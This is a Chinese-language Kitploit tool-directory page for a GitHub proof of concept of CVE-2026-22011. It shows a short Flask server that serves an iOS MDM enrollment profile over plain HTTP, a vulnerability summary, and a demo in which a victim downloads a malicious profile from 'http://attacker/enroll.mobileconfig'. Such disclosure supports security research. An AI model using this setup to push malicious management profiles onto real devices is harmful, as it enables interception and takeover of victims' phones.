Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP — 针对 CVE-2026-22011 的 PoC Flask 服务器,通过 HTTP 提供恶意 iOS MDM 注册描述文件,可实现中间人拦截与设备沦陷。 | Kitploit
工具/GitHubGitHub/george0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http
iOS安全漏洞分析漏洞利用网络安全渗透测试移动安全
GitHubgeorge0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http

CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP

针对 CVE-2026-22011 的 PoC Flask 服务器,通过 HTTP 提供恶意 iOS MDM 注册描述文件,可实现中间人拦截与设备沦陷。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
16天前尚未审核

CVE-2026-22011 – iOS MDM 配置文件通过 HTTP 传输

程序代码(Python Flask MDM 服务器)

root@kitploit:~
# mdm_server.py - Serves enrollment profile over plain HTTP
from flask import Flask, send_file

app = Flask(__name__)
@app.route('/enroll.mobileconfig')
def serve_profile():
    # Vulnerability: profile delivered without HTTPS
    return send_file('profile.mobileconfig', mimetype='application/x-apple-aspen-config')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

CVE-2026-22011 – iOS MDM 配置文件通过 HTTP 传输

Severity: High

概述

MDM 注册配置文件通过明文 HTTP 传输,没有加密或数字签名验证。同一网络上的攻击者可以拦截请求并将配置文件替换为恶意配置文件,从而获得设备管理权限。

漏洞详情

  • 类型: 中间人攻击 / 不安全传输
  • 影响: 通过恶意 MDM 导致设备完全沦陷。
  • 根本原因: 配置文件 URL 为 HTTP,而 iOS 不强制 MDM 注册使用 HTTPS(取决于配置),从而允许拦截。

漏洞利用演示

启动攻击者的 HTTP 服务器:

root@kitploit:~
python mdm_server.py

当受害者访问 http://attacker/enroll.mobileconfig 时,会下载恶意配置文件。

下载工具